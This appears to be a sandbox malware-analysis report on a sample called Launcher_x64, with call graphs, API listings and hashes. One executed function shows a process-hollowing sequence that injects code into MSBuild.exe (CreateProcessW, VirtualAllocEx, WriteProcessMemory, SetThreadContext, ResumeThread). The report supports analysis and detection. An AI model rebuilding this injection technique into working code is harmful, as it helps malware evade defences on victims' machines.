d15d47 21806->21808 21815 d15d00 21806->21815 21807->21812 21810 d15d4e TryAcquireSRWLockExclusive 21808->21810 21808->21812 21809 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21811 d0b93c 21809->21811 21810->21812 21811->21689 21811->21799 21812->21809 21814 d15d37 TryAcquireSRWLockExclusive 21814->21812 21814->21815 21815->21812 21815->21814 21816 d16a0d GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __aulldiv __aullrem __Xtime_get_ticks 21815->21816 21816->21815 22317 d1219d 78 API calls std::_Throw_Cpp_error 22252 d3f19e 22253 d3f1d4 22252->22253 22253->22253 22254 d3f321 GetPEB 22253->22254 22255 d3f333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 22253->22255 22260 d3f3ca TerminateProcess 22253->22260 22254->22255 22255->22253 22256 d3f3da WriteProcessMemory 22255->22256 22257 d3f41f 22256->22257 22258 d3f461 WriteProcessMemory Wow64SetThreadContext ResumeThread 22257->22258 22259 d3f424 WriteProcessMemory 22257->22259 22259->22257 22260->22253 22318 d02d80 14 API calls 22421 d05380 98 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22319 d11d80 21 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22320 d19d8f 7 API calls ___scrt_uninitialize_crt 22321 d265b2 41 API calls _Fputc 22331 d1f95d 68 API calls ___scrt_uninitialize_crt 22427 d2835e 11 API calls 3 library calls 22428 d05f40 95 API calls 3 library calls 22333 d17940 40 API calls 5 library calls 22429 d14348 72 API calls _AnonymousOriginator 22334 d26948 43 API calls 2 library calls 22336 d3194f 20 API calls 22337 d14175 68 API calls 22339 d31578 43 API calls 2 library calls 22340 d2897d 42 API calls 3 library calls 22344 d12163 48 API calls 2 library calls 22434 d13b64 31 API calls 22435 d20f64 66 API calls _Fputc 22346 d0ad10 61 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22347 d12113 32 API calls std::_Throw_Cpp_error 22438 d32315 IsProcessorFeaturePresent 22348 d29119 49 API calls 3 library calls 22443 d01b00 6 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22445 d14f09 57 API calls 2 library calls 22446 d19f0c 15 API calls 2 library calls 22448 d0af30 50 API calls 22353 d12934 16 API calls 2 library calls 22451 d24b37 15 API calls 21830 d16f39 21831 d16f45 ___scrt_is_nonwritable_in_current_image 21830->21831 21855 d124ec 21831->21855 21833 d16f4c 21834 d170a5 21833->21834 21844 d16f76 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 21833->21844 21887 d16528 4 API calls 2 library calls 21834->21887 21836 d170ac 21837 d170b2 21836->21837 21881 d1c9bd 21836->21881 21888 d1c9d3 21 API calls std::locale::_Setgloballocale 21837->21888 21840 d170ba 21841 d16f95 21842 d17016 21866 d1ef3c 21842->21866 21844->21841 21844->21842 21884 d1ca07 39 API calls 4 library calls 21844->21884 21846 d1701c 21870 d01c20 21846->21870 21849 d164d5 std::locale::_Setgloballocale GetModuleHandleW 21850 d1703d 21849->21850 21850->21836 21851 d17041 21850->21851 21852 d1704a 21851->21852 21885 d1c9e9 21 API calls std::locale::_Setgloballocale 21851->21885 21886 d12525 75 API calls ___scrt_uninitialize_crt 21852->21886 21856 d124f5 21855->21856 21889 d16194 IsProcessorFeaturePresent 21856->21889 21858 d12501 21890 d178c5 10 API calls 2 library calls 21858->21890 21860 d12506 21861 d1250a 21860->21861 21891 d19dff 21860->21891 21861->21833 21864 d12521 21864->21833 21867 d1ef45 21866->21867 21868 d1ef4a 21866->21868 21904 d1f065 57 API calls 21867->21904 21868->21846 21905 d02460 21870->21905 21878 d01c85 21879 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21878->21879 21880 d01ca4 21879->21880 21880->21849 22185 d1cb08 21881->22185 21884->21842 21885->21852 21886->21841 21887->21836 21888->21840 21889->21858 21890->21860 21895 d254a5 21891->21895 21894 d178e4 7 API calls 2 library calls 21894->21861 21896 d254b5 21895->21896 21897 d12513 21895->21897 21896->21897 21899 d24c19 21896->21899 21897->21864 21897->21894 21903 d24c20 21899->21903 21900 d24c63 GetStdHandle 21900->21903 21901 d24cc5 21901->21896 21902 d24c76 GetFileType 21902->21903 21903->21900 21903->21901 21903->21902 21904->21868 21906 d0248c 21905->21906 21929 d0a920 21906->21929 21909 d024b0 21910 d024e0 21909->21910 21997 d047f0 21910->21997 21915 d025a4 22004 d04b70 21915->22004 21916 d02806 21918 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21916->21918 21917 d0265d 21924 d026c2 21917->21924 22001 d114f0 21917->22001 21920 d01c6a 21918->21920 21925 d02270 21920->21925 21922 d11430 70 API calls 21922->21924 21923 d02590 21923->21915 21923->21917 22012 d11430 21923->22012 21924->21915 21924->21922 22113 d02820 21925->22113 21928 d02870 40 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 21928->21878 21938 d0aa60 21929->21938 21933 d0a962 21954 d0aaf0 21933->21954 21935 d0a978 21936 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21935->21936 21937 d01c52 21936->21937 21937->21909 21960 d11280 21938->21960 21941 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21942 d0a94d 21941->21942 21943 d0a9d0 21942->21943 21944 d0aa2b 21943->21944 21945 d0a9eb 21943->21945 21946 d1228f std::ios_base::_Init 16 API calls 21944->21946 21945->21944 21947 d0a9fc 21945->21947 21948 d0aa3c 21946->21948 21969 d1228f 21947->21969 21982 d0abc0 135 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 21948->21982 21952 d0aa1d 21952->21933 21956 d0ab04 21954->21956 21955 d0ab18 21958 d0ab31 21955->21958 21996 d02b40 40 API calls Concurrency::cancel_current_task 21955->21996 21956->21955 21995 d02b40 40 API calls Concurrency::cancel_current_task 21956->21995 21958->21935 21965 d112d0 21960->21965 21963 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21964 d0aa8d 21963->21964 21964->21941 21966 d112f9 21965->21966 21967 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21966->21967 21968 d112b0 21967->21968 21968->21963 21971 d12294 21969->21971 21972 d0aa0d 21971->21972 21974 d122b0 21971->21974 21983 d20ccc 21971->21983 21990 d1ccef EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 21971->21990 21981 d0ab80 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21972->21981 21975 d15f77 std::ios_base::_Init 21974->21975 21976 d122ba Concurrency::cancel_current_task 21974->21976 21992 d17223 RaiseException 21975->21992 21991 d17223 RaiseException 21976->21991 21978 d15f93 21980 d12dd9 21981->21952 21982->21952 21988 d231c1 __dosmaperr 21983->21988 21984 d231ff 21994 d1eb64 14 API calls __dosmaperr 21984->21994 21985 d231ea RtlAllocateHeap 21987 d231fd 21985->21987 21985->21988 21987->21971 21988->21984 21988->21985 21993 d1ccef EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 21988->21993 21990->21971 21991->21980 21992->21978 21993->21988 21994->21987 21998 d04810 21997->21998 22000 d0482d 21998->22000 22016 d04c90 21998->22016 22000->21923 22026 d150c2 22001->22026 22005 d04b95 22004->22005 22093 d09760 22005->22093 22008 d04bc0 22009 d04bd4 22008->22009 22010 d04bef 22009->22010 22112 d0a580 40 API calls 22009->22112 22010->21916 22013 d11448 22012->22013 22014 d11454 22013->22014 22015 d14cf2 70 API calls 22013->22015 22014->21923 22015->22014 22017 d04cb8 22016->22017 22018 d04d39 22017->22018 22020 d047f0 40 API calls 22017->22020 22019 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 22018->22019 22021 d04d43 22019->22021 22024 d04cd3 22020->22024 22021->22000 22022 d04ce6 22023 d04bc0 40 API calls 22022->22023 22023->22018 22024->22022 22025 d04b70 40 API calls 22024->22025 22025->22022 22029 d14b30 22026->22029 22030 d11531 22029->22030 22031 d14b56 codecvt 22029->22031 22030->21924 22031->22030 22033 d14cf2 22031->22033 22036 d14d20 22033->22036 22041 d14d19 22033->22041 22034 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 22035 d14e1e 22034->22035 22035->22031 22038 d14dd2 22036->22038 22039 d14d6b 22036->22039 22036->22041 22038->22041 22045 d2088d 69 API calls _Fputc 22038->22045 22039->22041 22042 d14915 22039->22042 22041->22034 22046 d201f7 22042->22046 22044 d14923 22044->22041 22045->22041 22047 d2020a _Fputc 22046->22047 22050 d20399 22047->22050 22049 d20219 _Fputc 22049->22044 22051 d203a5 ___scrt_is_nonwritable_in_current_image 22050->22051 22052 d203d1 22051->22052 22053 d203ac 22051->22053 22061 d19ee4 EnterCriticalSection 22052->22061 22091 d1f3f8 29 API calls 2 library calls 22053->22091 22056 d203e0 22062 d2022d 22056->22062 22060 d203c7 22060->22049 22061->22056 22063 d20252 22062->22063 22064 d20264 22062->22064 22065 d20365 _Fputc 66 API calls 22063->22065 22066 d268c0 _Fputc 29 API calls 22064->22066 22067 d2025c 22065->22067 22068 d2026b 22066->22068 22069 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 22067->22069 22070 d268c0 _Fputc 29 API calls 22068->22070 22074 d20293 22068->22074 22071 d20363 22069->22071 22073 d2027c 22070->22073 22092 d20421 LeaveCriticalSection _Ungetc 22071->22092 22072 d20349 22077 d20365 _Fputc 66 API calls 22072->22077 22073->22074 22075 d268c0 _Fputc 29 API calls 22073->22075 22074->22072 22076 d268c0 _Fputc 29 API calls 22074->22076 22078 d20288 22075->22078 22079 d202c6 22076->22079 22077->22067 22080 d268c0 _Fputc 29 API calls 22078->22080 22082 d268c0 _Fputc 29 API calls 22079->22082 22090 d202e9 22079->22090 22080->22074 22081 d20301 22083 d265ec _Fputc 41 API calls 22081->22083 22084 d202d2 22082->22084 22085 d20313 22083->22085 22086 d268c0 _Fputc 29 API calls 22084->22086 22084->22090 22085->22067 22089 d20096 _Fputc 66 API calls 22085->22089 22087 d202de 22086->22087 22088 d268c0 _Fputc 29 API calls 22087->22088 22088->22090 22089->22085 22090->22072 22090->22081 22091->22060 22092->22060 22096 d097b0 22093->22096 22097 d097f4 22096->22097 22098 d0989c 22096->22098 22102 d09814 22097->22102 22108 d17223 RaiseException 22097->22108 22099 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 22098->22099 22100 d027f3 22099->22100 22100->22008 22109 d098b0 38 API calls std::ios_base::_Init 22102->22109 22104 d0986f 22110 d098f0 31 API calls 2 library calls 22104->22110 22106 d09884 22111 d17223 RaiseException 22106->22111 22108->22102 22109->22104 22110->22106 22111->22098 22112->22010 22120 d11680 22113->22120 22118 d04c90 40 API calls 22119 d01c7a 22118->22119 22119->21928 22121 d116a4 22120->22121 22137 d116f0 22121->22137 22123 d116b2 std::ios_base::_Ios_base_dtor 22124 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 22123->22124 22125 d02848 22124->22125 22126 d11580 22125->22126 22127 d047f0 40 API calls 22126->22127 22128 d115af 22127->22128 22130 d11430 70 API calls 22128->22130 22132 d115c2 22128->22132 22129 d04b70 40 API calls 22131 d11652 22129->22131 22130->22132 22133 d04bc0 40 API calls 22131->22133 22132->22129 22134 d1165d 22133->22134 22135 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 22134->22135 22136 d02859 22135->22136 22136->22118 22156 d12616 22137->22156 22141 d11755 22170 d12647 22141->22170 22142 d1172a 22142->22141 22177 d11830 68 API calls 3 library calls 22142->22177 22145 d117e0 22147 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 22145->22147 22146 d11772 22149 d11780 22146->22149 22178 d04f60 RaiseException Concurrency::cancel_current_task 22146->22178 22148 d117ea 22147->22148 22148->22123 22150 d04f90 5 API calls 22149->22150 22152 d11794 22150->22152 22179 d126f8 16 API calls 2 library calls 22152->22179 22154 d117a2 22180 d04fe0 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22154->22180 22157 d12625 22156->22157 22158 d1262c 22156->22158 22181 d1f575 6 API calls 2 library calls 22157->22181 22161 d11714 22158->22161 22182 d16708 EnterCriticalSection 22158->22182 22162 d04d90 22161->22162 22163 d04db2 22162->22163 22164 d04dee 22162->22164 22165 d12616 std::_Lockit::_Lockit 7 API calls 22163->22165 22166 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 22164->22166 22167 d04dc3 22165->22167 22168 d04e00 22166->22168 22169 d12647 std::_Lockit::~_Lockit 2 API calls 22167->22169 22168->22142 22169->22164 22171 d1f583 22170->22171 22173 d12651 22170->22173 22184 d1f55e LeaveCriticalSection 22171->22184 22172 d12664 22172->22145 22173->22172 22183 d16716 LeaveCriticalSection 22173->22183 22176 d1f58a 22176->22145 22177->22146 22179->22154 22180->22141 22181->22161 22182->22161 22183->22172 22184->22176 22186 d1cb35 22185->22186 22194 d1cb46 22185->22194 22187 d164d5 std::locale::_Setgloballocale GetModuleHandleW 22186->22187 22190 d1cb3a 22187->22190 22190->22194 22211 d1ca3c GetModuleHandleExW 22190->22211 22191 d1c9ce 22191->21837 22196 d1cca2 22194->22196 22195 d1cb99 22197 d1ccae ___scrt_is_nonwritable_in_current_image 22196->22197 22217 d1f547 EnterCriticalSection 22197->22217 22199 d1ccb8 22218 d1cb9f 22199->22218 22201 d1ccc5 22222 d1cce3 22201->22222 22204 d1cad7 22227 d1cabe 22204->22227 22206 d1cae1 22207 d1caf5 22206->22207 22208 d1cae5 GetCurrentProcess TerminateProcess 22206->22208 22209 d1ca3c std::locale::_Setgloballocale 3 API calls 22207->22209 22208->22207 22210 d1cafd ExitProcess 22209->22210 22212 d1ca7b GetProcAddress 22211->22212 22213 d1ca9c 22211->22213 22212->22213 22216 d1ca8f 22212->22216 22214 d1caa2 FreeLibrary 22213->22214 22215 d1caab 22213->22215 22214->22215 22215->22194 22216->22213 22217->22199 22219 d1cbab ___scrt_is_nonwritable_in_current_image std::locale::_Setgloballocale 22218->22219 22221 d1cc0f std::locale::_Setgloballocale 22219->22221 22225 d1e86e 14 API calls 3 library calls 22219->22225 22221->22201 22226 d1f55e LeaveCriticalSection 22222->22226 22224 d1cb7e 22224->22191 22224->22204 22225->22221 22226->22224 22230 d268fc 22227->22230 22229 d1cac3 std::locale::_Setgloballocale 22229->22206 22231 d2690b std::locale::_Setgloballocale 22230->22231 22232 d26918 22231->22232 22234 d24077 22231->22234 22232->22229 22237 d241c4 22234->22237 22238 d241f4 22237->22238 22241 d24093 22237->22241 22238->22241 22244 d240f9 22238->22244 22241->22232 22242 d2420e GetProcAddress 22242->22241 22243 d2421e __dosmaperr 22242->22243 22243->22241 22246 d2410a ___vcrt_FlsGetValue 22244->22246 22245 d241a0 22245->22241 22245->22242 22246->22245 22247 d24128 LoadLibraryExW 22246->22247 22251 d24176 LoadLibraryExW 22246->22251 22248 d24143 GetLastError 22247->22248 22249 d241a7 22247->22249 22248->22246 22249->22245 22250 d241b9 FreeLibrary 22249->22250 22250->22245 22251->22246 22251->22249 22453 d0d320 134 API calls 3 library calls 22455 d17723 54 API calls 2 library calls 22457 d16f27 30 API calls

                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                        Function 00D3F19E Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00D3F110,00D3F100), ref: 00D3F334
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00D3F347
                                                                                                                                                                                                                                                                                        • Wow64GetThreadContext.KERNEL32(00000238,00000000), ref: 00D3F365
                                                                                                                                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(00000234,?,00D3F154,00000004,00000000), ref: 00D3F389
                                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(00000234,?,?,00003000,00000040), ref: 00D3F3B4
                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNELBASE(00000234,00000000), ref: 00D3F3D3
                                                                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000234,00000000,?,?,00000000,?), ref: 00D3F40C
                                                                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000234,00400000,?,?,00000000,?,00000028), ref: 00D3F457
                                                                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000234,?,?,00000004,00000000), ref: 00D3F495
                                                                                                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(00000238,00A50000), ref: 00D3F4D1
                                                                                                                                                                                                                                                                                        • ResumeThread.KERNELBASE(00000238), ref: 00D3F4E0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                                                                                                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                                                                        • API String ID: 2440066154-3857624555
                                                                                                                                                                                                                                                                                        • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                                                        • Instruction ID: 045249823c58810deb4379e5bfa476f2152e717e5a6a14cfc1d4eb1940260b2c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7B1F97664064AAFDB60CF68CC80BDA73A5FF88714F158124EA0CAB341D774FA51CBA4
                                                                                                                                                                                                                                                                                        Function 00D240F9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 25 d240f9-d24105 26 d24197-d2419a 25->26 27 d241a0 26->27 28 d2410a-d2411b 26->28 29 d241a2-d241a6 27->29 30 d24128-d24141 LoadLibraryExW 28->30 31 d2411d-d24120 28->31 34 d24143-d2414c GetLastError 30->34 35 d241a7-d241b7 30->35 32 d241c0-d241c2 31->32 33 d24126 31->33 32->29 37 d24194 33->37 38 d24185-d24192 34->38 39 d2414e-d24160 call d276c1 34->39 35->32 36 d241b9-d241ba FreeLibrary 35->36 36->32 37->26 38->37 39->38 42 d24162-d24174 call d276c1 39->42 42->38 45 d24176-d24183 LoadLibraryExW 42->45 45->35 45->38
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,E7FA7683,?,00D24208,00D03E32,?,00000000,?), ref: 00D241BA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                                        • Opcode ID: e1b2a30326aca85056b474640c2694a1a7fb7e4afb5108da6d0e2efb620827e9
                                                                                                                                                                                                                                                                                        • Instruction ID: 085cc1d4ec07c4ecb6de441a293fa9104b3fba6893152b87d4fd31ec95b4c2e9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1b2a30326aca85056b474640c2694a1a7fb7e4afb5108da6d0e2efb620827e9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9721D235A01331ABD7229B65FC45A5A375ADF717A8F290220FD15E7390E630EE60CAB0
                                                                                                                                                                                                                                                                                        Function 00D01890 Relevance: 9.2, APIs: 6, Instructions: 162fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1378416451-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 42be21327a0a5c74ac7ec5dfa785c1521b9d48e6f2418f16775b72bb53d3b26d
                                                                                                                                                                                                                                                                                        • Instruction ID: 70404eaed23b885386260762f211daf3b616366ed547e8b94eb05bee4214a340
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42be21327a0a5c74ac7ec5dfa785c1521b9d48e6f2418f16775b72bb53d3b26d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C719EB4D05248CFDB00EFA8D58879DBBF0BF48304F14852AE899AB391D734A945CF62
                                                                                                                                                                                                                                                                                        Function 00D08730 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 477COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 80 d08730-d08795 81 d087d0-d087f3 call d06a80 80->81 82 d0879b-d087ac 80->82 87 d087f9-d08805 81->87 88 d0880a-d08822 81->88 83 d087b2-d087be 82->83 84 d087c4-d087ca 82->84 83->84 84->81 89 d08880-d089c0 call d21170 call d20ca4 call d21170 call d049d0 call d06aa0 call d04a00 call d06bb0 call d06c50 call d06c10 call d049d0 call d06c70 call d04a00 call d06d80 call d06db0 87->89 90 d08828-d08838 88->90 91 d0887b 88->91 123 d089f3-d089fa 89->123 124 d089c6-d089f1 call d092f0 call d06c50 89->124 90->91 92 d0883e-d0884f 90->92 91->89 94 d08855-d08866 92->94 95 d0886c-d08875 92->95 94->91 94->95 95->91 126 d08a00-d08a09 123->126 127 d08b21-d08b3a call d01dc0 call d06ee0 123->127 124->123 128 d08a20-d08a26 126->128 129 d08a0f-d08a1b 126->129 141 d08b40-d08b50 call d06ee0 127->141 142 d08b56-d08b60 127->142 132 d08a2c-d08a4c call d06c50 128->132 129->132 140 d08a52-d08a66 132->140 143 d08aa7-d08aaf 140->143 144 d08a6c-d08a81 140->144 141->142 158 d08b65-d08b70 call d06ee0 141->158 146 d08b76-d08b90 call d06a80 142->146 149 d08ab5-d08b1c 143->149 150 d08aba-d08b02 call d06dd0 143->150 144->143 147 d08a87-d08aa1 144->147 156 d08c81-d08c8b 146->156 157 d08b96-d08ba0 146->157 147->143 149->127 164 d08b17 150->164 165 d08b08-d08b11 150->165 161 d08c91-d08d79 call d06c50 call d06f80 call d06f00 156->161 162 d08d7e-d08e04 call d06c50 call d06f80 156->162 157->156 160 d08ba6-d08c7c call d06f00 call d06c50 call d06f80 157->160 158->146 182 d08e0c-d08e82 call d06c50 call d06f80 160->182 179 d08e07 161->179 162->179 164->140 165->164 179->182 188 d08e87-d08f2c call d07010 call d06f00 call d01e70 * 2 call d12303 182->188
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
